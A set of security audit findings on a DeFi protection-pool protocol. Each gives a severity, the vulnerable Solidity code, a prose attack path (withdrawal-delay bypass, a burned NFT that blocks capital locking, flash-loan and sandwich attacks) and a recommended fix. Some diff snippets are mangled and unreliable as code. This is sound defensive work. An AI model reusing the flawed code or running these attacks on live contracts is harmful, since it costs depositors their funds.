Use _accumulateExternalRewards and _updateExternalRewardState in claimFees to accrue rewards.\\n```\\n function claimFees() external onlyRole("liquidityvault_admin") {\\n uint256 numInternalRewardTokens = internalRewardTokens.length;\\n uint256 numExternalRewardTokens = externalRewardTokens.length;\\n\\n for (uint256 i; i < numInternalRewardTokens; ) {\\n address rewardToken = internalRewardTokens[i].token;\\n uint256 feeToSend = accumulatedFees[rewardToken];\\n\\n accumulatedFees[rewardToken] = 0;\\n\\n ERC20(rewardToken).safeTransfer(msg.sender, feeToSend);\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n// Add the line below\\n uint256[] memory accumulatedExternalRewards = _accumulateExternalRewards();\\n for (uint256 i; i < numExternalRewardTokens; ) {\\n// Add the line below\\n _updateExternalRewardState(i, accumulatedExternalRewards[i]);\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 feeToSend = accumulatedFees[rewardToken.token];\\n\\n accumulatedFees[rewardToken.token] = 0;\\n\\n ERC20(rewardToken.token).safeTransfer(msg.sender, feeToSend);\\n rewardToken.lastBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n unchecked {\\n // Add the line below\\n// Add the line below\\ni;\\n }\\n }\\n }\\n```\\n
It will cause some external rewards to be locked in the contract
```\\n function _accumulateExternalRewards() internal override returns (uint256[] memory) {\\n uint256 numExternalRewards = externalRewardTokens.length;\\n\\n auraPool.rewardsPool.getReward(address(this), true);\\n\\n uint256[] memory rewards = new uint256[](numExternalRewards);\\n for (uint256 i; i < numExternalRewards; ) {\\n ExternalRewardToken storage rewardToken = externalRewardTokens[i];\\n uint256 newBalance = ERC20(rewardToken.token).balanceOf(address(this));\\n\\n // This shouldn't happen but adding a sanity check in case\\n if (newBalance < rewardToken.lastBalance) {\\n emit LiquidityVault_ExternalAccumulationError(rewardToken.token);\\n continue;\\n }\\n\\n rewards[i] = newBalance - rewardToken.lastBalance;\\n rewardToken.lastBalance = newBalance;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n return rewards;\\n }\\n// rest of code\\n function _updateExternalRewardState(uint256 id_, uint256 amountAccumulated_) internal {\\n // This correctly uses 1e18 because the LP tokens of all major DEXs have 18 decimals\\n if (totalLP != 0)\\n externalRewardTokens[id_].accumulatedRewardsPerShare +=\\n (amountAccumulated_ * 1e18) /\\n totalLP;\\n }\\n```\\n
Protection sellers can bypass withdrawal delay mechanism and avoid losing funds when loans are defaulted by creating withdrawal request in each cycle
high
To prevent protection sellers from withdrawing fund immediately when protected lending pools are defaults, there is withdrawal delay mechanism, but it's possible to bypass it by creating withdraw request in each cycle by doing so user can withdraw in each cycle's open state. there is no penalty for users when they do this or there is no check to avoid this.\\nThis is `_requestWithdrawal()` code:\\n```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n\\nAs you can see it doesn't keep track of user current withdrawal requests and user can request withdrawal for all of his balance in each cycle and by doing so user can set `withdrawalCycleDetails[Each Cycle][User]` to user's sToken balance. and whenever user wants to withdraw he only need to wait until the end of the current cycle while he should have waited until next cycle end.
To avoid this code should keep track of user balance that is not in withdraw delay and user balance that are requested for withdraw. and to prevent users from requesting withdrawing and not doing it protocol should have some penalties for withdrawals, for example the waiting withdraw balance shouldn't get reward in waiting duration.
protection sellers can request withdraw in each cycle for their full sToken balance and code would allow them to withdraw in each cycle end time because code doesn't track how much of the balance of users is requested for withdrawals in the past.
```\\n function _requestWithdrawal(uint256 _sTokenAmount) internal {\\n uint256 _sTokenBalance = balanceOf(msg.sender);\\n if (_sTokenAmount > _sTokenBalance) {\\n revert InsufficientSTokenBalance(msg.sender, _sTokenBalance);\\n }\\n\\n /// Get current cycle index for this pool\\n uint256 _currentCycleIndex = poolCycleManager.getCurrentCycleIndex(\\n address(this)\\n );\\n\\n /// Actual withdrawal is allowed in open period of cycle after next cycle\\n /// For example: if request is made in at some time in cycle 1,\\n /// then withdrawal is allowed in open period of cycle 3\\n uint256 _withdrawalCycleIndex = _currentCycleIndex + 2;\\n\\n WithdrawalCycleDetail storage withdrawalCycle = withdrawalCycleDetails[\\n _withdrawalCycleIndex\\n ];\\n\\n /// Cache existing requested amount for the cycle for the sender\\n uint256 _oldRequestAmount = withdrawalCycle.withdrawalRequests[msg.sender];\\n withdrawalCycle.withdrawalRequests[msg.sender] = _sTokenAmount;\\n\\n unchecked {\\n /// Update total requested withdrawal amount for the cycle considering existing requested amount\\n if (_oldRequestAmount > _sTokenAmount) {\\n withdrawalCycle.totalSTokenRequested -= (_oldRequestAmount -\\n _sTokenAmount);\\n } else {\\n withdrawalCycle.totalSTokenRequested += (_sTokenAmount -\\n _oldRequestAmount);\\n }\\n }\\n\\n emit WithdrawalRequested(msg.sender, _sTokenAmount, _withdrawalCycleIndex);\\n }\\n```\\n
Lending pool state transition will be broken when pool is expired in late state
high
Lending pool state transition will be broken when pool is expired in late state\\n```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n\\nAs you can see, pool is expired if time of credit line has ended or loan is fully paid.\\nState transition for lending pool is done inside `DefaultStateManager._assessState` function. This function is responsible to lock capital, when state is late and unlock it when it's changed from late to active again.\\nBecause the first state that is checked is `expired` there can be few problems.\\nFirst problem. Suppose that lending pool is in late state. So capital is locked. There are 2 options now: payment was done, so pool becomes active and capital unlocked, payment was not done then pool has defaulted. But in case when state is late, and lending pool expired or loan is fully repaid(so it's also becomes expired), then capital will not be unlocked as there is no such transition Late -> Expired. The state will be changed to Expired and no more actions will be done. Also in this case it's not possible to detect if lending pool expired because of time or because no payment was done.\\nSecond problem. Lending pool is in active state. Last payment should be done some time before `_creditLine.termEndTime()`. Payment was not done, which means that state should be changed to Late and capital should be locked, but state was checked when loan has ended, so it became Expired and again there is no such transition that can detect that capital should be locked in this case. The state will be changed to Expired and no more actions will be done.
These are tricky cases, think about transition for lending pool in such cases.
Depending on situation, capital can be locked forever or protection buyers will not be compensated.
```\\n function _getLendingPoolStatus(address _lendingPoolAddress)\\n internal\\n view\\n returns (LendingPoolStatus)\\n {\\n if (!_isReferenceLendingPoolAdded(_lendingPoolAddress)) {\\n return LendingPoolStatus.NotSupported;\\n }\\n\\n\\n ILendingProtocolAdapter _adapter = _getLendingProtocolAdapter(\\n _lendingPoolAddress\\n );\\n\\n\\n if (_adapter.isLendingPoolExpired(_lendingPoolAddress)) {\\n return LendingPoolStatus.Expired;\\n }\\n\\n\\n if (\\n _adapter.isLendingPoolLateWithinGracePeriod(\\n _lendingPoolAddress,\\n Constants.LATE_PAYMENT_GRACE_PERIOD_IN_DAYS\\n )\\n ) {\\n return LendingPoolStatus.LateWithinGracePeriod;\\n }\\n\\n\\n if (_adapter.isLendingPoolLate(_lendingPoolAddress)) {\\n return LendingPoolStatus.Late;\\n }\\n\\n\\n return LendingPoolStatus.Active;\\n }\\n```\\n
Existing buyer who has been regularly renewing protection will be denied renewal even when she is well within the renewal grace period
high
Existing buyers have an opportunity to renew their protection within grace period. If lending state update happens from `Active` to `LateWithinGracePeriod` just 1 second after a buyer's protection expires, protocol denies buyer an opportunity even when she is well within the grace period.\\nSince defaults are not sudden and an `Active` loan first transitions into `LateWithinGracePeriod`, it is unfair to deny an existing buyer an opportunity to renew (its alright if a new protection buyer is DOSed). This is especially so because a late loan can become `active` again in future (or move to `default`, but both possibilities exist at this stage).\\nAll previous protection payments are a total loss for a buyer when she is denied a legitimate renewal request at the first sign of danger.\\n`renewProtection` first calls `verifyBuyerCanRenewProtection` that checks if the user requesting renewal holds same NFT id on same lending pool address & that the current request is within grace period defined by protocol.\\nOnce successfully verified, `renewProtection` calls `_verifyAndCreateProtection` to renew protection. This is the same function that gets called when a new protection is created.\\nNotice that this function calls `_verifyLendingPoolIsActive` as part of its verification before creating new protection - this check denies protection on loans that are in `LateWithinGracePeriod` or `Late` phase (see snippet below).\\n```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n
When a user is calling `renewProtection`, a different implementation of `verifyLendingPoolIsActive` is needed that allows a user to renew even when lending pool status is `LateWithinGracePeriod` or `Late`.\\nRecommend using `verifyLendingPoolIsActiveForRenewal` function in renewal flow as shown below\\n```\\n function verifyLendingPoolIsActiveForRenewal(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n if (poolStatus == LendingPoolStatus.NotSupported) {\\n revert IProtectionPool.LendingPoolNotSupported(_lendingPoolAddress);\\n }\\n //------ audit - this section needs to be commented-----//\\n //if (\\n // poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n // poolStatus == LendingPoolStatus.Late\\n //) {\\n // revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n //}\\n // ---------------------------------------------------------//\\n\\n if (poolStatus == LendingPoolStatus.Expired) {\\n revert IProtectionPool.LendingPoolExpired(_lendingPoolAddress);\\n }\\n\\n if (poolStatus == LendingPoolStatus.Defaulted) {\\n revert IProtectionPool.LendingPoolDefaulted(_lendingPoolAddress);\\n }\\n }\\n```\\n
User who has been regularly renewing protection and paying premium to protect against a future loss event will be denied that very protection when she most needs it.\\nIf existing user is denied renewal, she can never get back in (unless the lending pool becomes active again). All her previous payments were a total loss for her.
```\\nfunction _verifyLendingPoolIsActive(\\n IDefaultStateManager defaultStateManager,\\n address _protectionPoolAddress,\\n address _lendingPoolAddress\\n ) internal view {\\n LendingPoolStatus poolStatus = defaultStateManager.getLendingPoolStatus(\\n _protectionPoolAddress,\\n _lendingPoolAddress\\n );\\n\\n // rest of code\\n if (\\n poolStatus == LendingPoolStatus.LateWithinGracePeriod ||\\n poolStatus == LendingPoolStatus.Late\\n ) {\\n revert IProtectionPool.LendingPoolHasLatePayment(_lendingPoolAddress);\\n }\\n // rest of code\\n}\\n```\\n
Malicious seller forced break lockCapital()
high
Malicious burn nft causes failure to lockCapital() ,seller steady earn PremiumAmount, buyer will be lost compensation\\nWhen the status of the lendingPool changes from Active to Late, the protocol will call ProtectionPool.lockCapital() to lock amount lockCapital() will loop through the active protections to calculate the `lockedAmount`. The code is as follows:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n\\nThe important thing inside is to calculate the _remainingPrincipal by `referenceLendingPools.calculateRemainingPrincipal()`\\n```\\n function calculateRemainingPrincipal(\\n address _lendingPoolAddress,\\n address _lender,\\n uint256 _nftLpTokenId\\n ) public view override returns (uint256 _principalRemaining) {\\n// rest of code\\n\\n if (_poolTokens.ownerOf(_nftLpTokenId) == _lender) { //<------------call ownerOf()\\n IPoolTokens.TokenInfo memory _tokenInfo = _poolTokens.getTokenInfo(\\n _nftLpTokenId\\n );\\n\\n// rest of code.\\n if (\\n _tokenInfo.pool == _lendingPoolAddress &&\\n _isJuniorTrancheId(_tokenInfo.tranche)\\n ) {\\n _principalRemaining =\\n _tokenInfo.principalAmount -\\n _tokenInfo.principalRedeemed;\\n }\\n }\\n }\\n```\\n\\nGoldfinchAdapter.calculateRemainingPrincipal() The current implementation will first determine if the ownerOf the NFTID is _lender\\nThere is a potential problem here, if the NFTID has been burned, the ownerOf() will be directly revert, which will lead to calculateRemainingPrincipal() revert,and lockCapital() revert and can't change status from active to late\\nLet's see whether Goldfinch's implementation supports burn(NFTID), and whether ownerOf(NFTID) will revert\\nPoolTokens has burn() method , if principalRedeemed==principalAmount you can burn it\\n```\\ncontract PoolTokens is IPoolTokens, ERC721PresetMinterPauserAutoIdUpgradeSafe, HasAdmin, IERC2981 {\\n// rest of code..\\n function burn(uint256 tokenId) external virtual override whenNotPaused {\\n TokenInfo memory token = _getTokenInfo(tokenId);\\n bool canBurn = _isApprovedOrOwner(_msgSender(), tokenId);\\n bool fromTokenPool = _validPool(_msgSender()) && token.pool == _msgSender();\\n address owner = ownerOf(tokenId);\\n require(canBurn || fromTokenPool, "ERC721Burnable: caller cannot burn this token");\\n require(token.principalRedeemed == token.principalAmount, "Can only burn fully redeemed tokens");\\n _destroyAndBurn(tokenId);\\n emit TokenBurned(owner, token.pool, tokenId);\\n }\\n```\\n\\n2.ownerOf() if nftid don't exists will revert with message "ERC721: owner query for nonexistent token"\\n```\\ncontract ERC721UpgradeSafe is\\n Initializable,\\n ContextUpgradeSafe,\\n ERC165UpgradeSafe,\\n IERC721,\\n IERC721Metadata,\\n IERC721Enumerable\\n{\\n// rest of code\\n function ownerOf(uint256 tokenId) public view override returns (address) {\\n return _tokenOwners.get(tokenId, "ERC721: owner query for nonexistent token");\\n }\\n```\\n\\nIf it can't changes to late, Won't lock the fund, seller steady earn PremiumAmount\\nSo there are two risks\\nnormal buyer gives NFTID to burn(), he does not know that it will affect all protection of the lendingPool\\nMalicious seller can buy a protection first, then burn it, so as to force all protection of the lendingPool to expire and get the PremiumAmount maliciously. buyer unable to obtain compensation\\nSuggested try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner
try catch for _poolTokens.ownerOf() If revert, it is assumed that the lender is not the owner
buyer will be lost compensation
```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n// rest of code.\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n// rest of code\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal( //<----------- calculate Remaining Principal\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n```\\n
function lockCapital() doesn't filter the expired protections first and code may lock more funds than required and expired defaulted protections may funded
medium
when a lending loan defaults, then function `lockCapital()` get called in the ProtectionPool to lock required funds for the protections bought for that lending pool, but code doesn't filter the expired protections first and they may be expired protection in the active protection array that are not excluded and this would cause code to lock more fund and pay fund for expired defaulted protections and protection sellers would lose more funds.\\nThis `lockCapital()` code:\\n```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n\\nAs you can see code loops through active protection array for that lending pool and calculates required locked amount but it doesn't call `_accruePremiumAndExpireProtections()` to make sure active protections doesn't include any expired protections. if function `_accruePremiumAndExpireProtections()` doesn't get called for a while, then there would be possible that some of the protections are expired and they are still in the active protection array. This would cause code to calculated more locked amount and also pay fund for those expired defaulted protections too from protection sellers. (also when calculating the required token payment for the protection code doesn't check the expiration too in the other functions that are get called by the `lockCapital()`, the expire check doesn't exists in inner function too)
call `_accruePremiumAndExpireProtections()` for the defaulted pool to filter out the expired protections.
see summery
```\\n function lockCapital(address _lendingPoolAddress)\\n external\\n payable\\n override\\n onlyDefaultStateManager\\n whenNotPaused\\n returns (uint256 _lockedAmount, uint256 _snapshotId)\\n {\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n\\n /// step 2: calculate total capital to be locked\\n LendingPoolDetail storage lendingPoolDetail = lendingPoolDetails[\\n _lendingPoolAddress\\n ];\\n\\n /// Get indexes of active protection for a lending pool from the storage\\n EnumerableSetUpgradeable.UintSet\\n storage activeProtectionIndexes = lendingPoolDetail\\n .activeProtectionIndexes;\\n\\n /// Iterate all active protections and calculate total locked amount for this lending pool\\n /// 1. calculate remaining principal amount for each loan protection in the lending pool.\\n /// 2. for each loan protection, lockedAmt = min(protectionAmt, remainingPrincipal)\\n /// 3. total locked amount = sum of lockedAmt for all loan protections\\n uint256 _length = activeProtectionIndexes.length();\\n for (uint256 i; i < _length; ) {\\n /// Get protection info from the storage\\n uint256 _protectionIndex = activeProtectionIndexes.at(i);\\n ProtectionInfo storage protectionInfo = protectionInfos[_protectionIndex];\\n\\n /// Calculate remaining principal amount for a loan protection in the lending pool\\n uint256 _remainingPrincipal = poolInfo\\n .referenceLendingPools\\n .calculateRemainingPrincipal(\\n _lendingPoolAddress,\\n protectionInfo.buyer,\\n protectionInfo.purchaseParams.nftLpTokenId\\n );\\n\\n /// Locked amount is minimum of protection amount and remaining principal\\n uint256 _protectionAmount = protectionInfo\\n .purchaseParams\\n .protectionAmount;\\n uint256 _lockedAmountPerProtection = _protectionAmount <\\n _remainingPrincipal\\n ? _protectionAmount\\n : _remainingPrincipal;\\n\\n _lockedAmount += _lockedAmountPerProtection;\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n unchecked {\\n /// step 3: Update total locked & available capital in storage\\n if (totalSTokenUnderlying < _lockedAmount) {\\n /// If totalSTokenUnderlying < _lockedAmount, then lock all available capital\\n _lockedAmount = totalSTokenUnderlying;\\n totalSTokenUnderlying = 0;\\n } else {\\n /// Reduce the total sToken underlying amount by the locked amount\\n totalSTokenUnderlying -= _lockedAmount;\\n }\\n }\\n }\\n```\\n
If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium
medium
If the unlocked capital in a pool falls below the minRequiredCapital, then protection can be bought for minimum premium\\nIn PremiumCalculator.calculatePremium, we see that if the risk factor "cannot be calculated," it uses the minimum premium.\\n```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n\\nIn RiskFactor.canCalculateRiskFactor, we see there are three conditions when this is so:\\n```\\n function canCalculateRiskFactor(\\n uint256 _totalCapital,\\n uint256 _leverageRatio,\\n uint256 _leverageRatioFloor,\\n uint256 _leverageRatioCeiling,\\n uint256 _minRequiredCapital\\n ) external pure returns (bool _canCalculate) {\\n if (\\n _totalCapital < _minRequiredCapital ||\\n _leverageRatio < _leverageRatioFloor ||\\n _leverageRatio > _leverageRatioCeiling\\n ) {\\n _canCalculate = false;\\n } else {\\n _canCalculate = true;\\n }\\n }\\n}\\n```\\n\\nIf the leverage ratio is above the ceiling, then protection should be very cheap, and it is correct to use the minimum premium. If the leverage ratio is above the floor, then protection cannot be purchased.\\nHowever, we see that the minimum premium is also used if _totalCapital is below _minRequiredCapital. In this case, protection should be very expensive, but it will instead be very cheap.
Issue If unlocked capital in pool falls below minRequiredCapital, then protection can be bought for minimum premium\\nProhibit protection purchases when capital falls below the minimum required capital
Buyers can get very cheap protection at a time when it should be expensive.
```\\n if (\\n RiskFactorCalculator.canCalculateRiskFactor(\\n _totalCapital,\\n _leverageRatio,\\n _poolParameters.leverageRatioFloor,\\n _poolParameters.leverageRatioCeiling,\\n _poolParameters.minRequiredCapital\\n )\\n ) {\\n // rest of code\\n } else {\\n /// This means that the risk factor cannot be calculated because of either\\n /// min capital not met or leverage ratio out of range.\\n /// Hence, the premium is the minimum premium\\n _isMinPremium = true;\\n }\\n```\\n
secondary markets are problematic with how `lockCapital` works
medium
Seeing that a pool is about to lock, an attacker can use a flash loan from a secondary market like uniswap to claim the share of a potential unlock of capital later.\\nThe timestamp a pool switches to `Late` can be predicted and an attacker can use this to call `assessState` which is callable by anyone. This will trigger the pool to move from Active/LateWithinGracePeriod to `Late` calling `lockCapital` on the ProtectionPool:\\n```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n\\nThis records who is holding sTokens at this point in time. If the borrower makes a payment and the pool turns back to Active, later the locked funds will be available to claim for the sToken holders at that snapshot:\\n```\\nFile: DefaultStateManager.sol\\n\\n /// The claimable amount for the given seller is proportional to the seller's share of the total supply at the snapshot\\n /// claimable amount = (seller's snapshot balance / total supply at snapshot) * locked capital amount\\n _claimableUnlockedCapital =\\n (_poolSToken.balanceOfAt(_seller, _snapshotId) *\\n lockedCapital.amount) /\\n _poolSToken.totalSupplyAt(_snapshotId);\\n```\\n\\nFrom docs:\\nIf sellers wish to redeem their capital and interest before the lockup period, they might be able to find a buyer of their sToken in a secondary market like Uniswap. Traders in the exchanges can long/short sTokens based on their opinion about the risk exposure associated with sTokens. Since an sToken is a fungible ERC20 token, it is fairly easy to bootstrap the secondary markets for protection sellers.\\nIf there is a uniswap (or similar) pool for this sToken, an attacker could potentially, using a flash loan, trigger the switch to `Late` and since they will be the ones holding the sTokens at the point of locking they will be the ones that can claim the funds at a potential unlock.
I recommend you make `assessState` only callable by a trusted user. This would remove the attack vector, since you must hold the tokens over a transaction. It would still be possible to use the withdraw bug, but if that is fixed this would remove the possibility to "flash-lock".
An attacker can, using a flash loan from a secondary market like uniswap, steal a LPs possible share of unlocked tokens. Only paying taking the risk of the flash loan fee.
```\\nFile: ProtectionPool.sol\\n\\n /// step 1: Capture protection pool's current investors by creating a snapshot of the token balance by using ERC20Snapshot in SToken\\n _snapshotId = _snapshot();\\n```\\n
Sandwich attack to accruePremiumAndExpireProtections()
high
Let's show how a malicious user, Bob, can launch a sandwich attack to `accruePremiumAndExpireProtections()` and profit.\\nSuppose there are 1,000,000 underlying tokens for the `ProtectionPool`, and `totalSupply = 1,000,000`, therefore the exchange rate is 1/1 share. Suppose Bob has 100,000 shares.\\nSuppose `accruePremiumAndExpireProtections()` is going to be called and add 100,000 to `totalSTokenUnderlying` at L346.\\nBob front-runs `accruePremiumAndExpireProtections()` and calls `deposit()` to deposit 100,000 underlying tokens into the contract. The check for `ProtectionPoolPhase` will pass for an open phase. As a result, there are 1,100,000 underlying tokens, and 1,100,000 shares, the exchange rate is still 1/1 share. Bob now has 200,000 shares.\\n```\\n function deposit(uint256 _underlyingAmount, address _receiver)\\n external\\n override\\n whenNotPaused\\n nonReentrant\\n {\\n _deposit(_underlyingAmount, _receiver);\\n }\\n\\n function _deposit(uint256 _underlyingAmount, address _receiver) internal {\\n /// Verify that the pool is not in OpenToBuyers phase\\n if (poolInfo.currentPhase == ProtectionPoolPhase.OpenToBuyers) {\\n revert ProtectionPoolInOpenToBuyersPhase();\\n }\\n\\n uint256 _sTokenShares = convertToSToken(_underlyingAmount);\\n totalSTokenUnderlying += _underlyingAmount;\\n _safeMint(_receiver, _sTokenShares);\\n poolInfo.underlyingToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _underlyingAmount\\n );\\n\\n /// Verify leverage ratio only when total capital/sTokenUnderlying is higher than minimum capital requirement\\n if (_hasMinRequiredCapital()) {\\n /// calculate pool's current leverage ratio considering the new deposit\\n uint256 _leverageRatio = calculateLeverageRatio();\\n\\n if (_leverageRatio > poolInfo.params.leverageRatioCeiling) {\\n revert ProtectionPoolLeverageRatioTooHigh(_leverageRatio);\\n }\\n }\\n\\n emit ProtectionSold(_receiver, _underlyingAmount);\\n }\\n```\\n\\nNow accruePremiumAndExpireProtections()gets called and 100,000 is added to `totalSTokenUnderlying` at L346. As a result, we have 1,200,000 underlying tokens with 1,100,000 shares. The exchange rate becomes 12/11 share.\\nBob calls the `withdraw()` function (assume he made a request two cycles back, he could do that since he had 100,000 underlying tokens in the pool) to withdraw 100,000 shares and he will get `100,000*12/11 = 109,090` underlying tokens. So he has a profit of 9,090 underlying tokens by the sandwich attack.
Create a new contract as a temporary place to store the accrued premium, and then deliver it to the `ProtectionPool` over a period of time (delivery period) with some `premiumPerSecond` to lower the incentive of a quick profit by sandwich attack.\\nRestrict the maximum deposit amount for each cycle.\\nRestrict the maximum withdraw amount for each cycle.
A malicious user can launch a sandwich attack to accruePremiumAndExpireProtections()and profit.
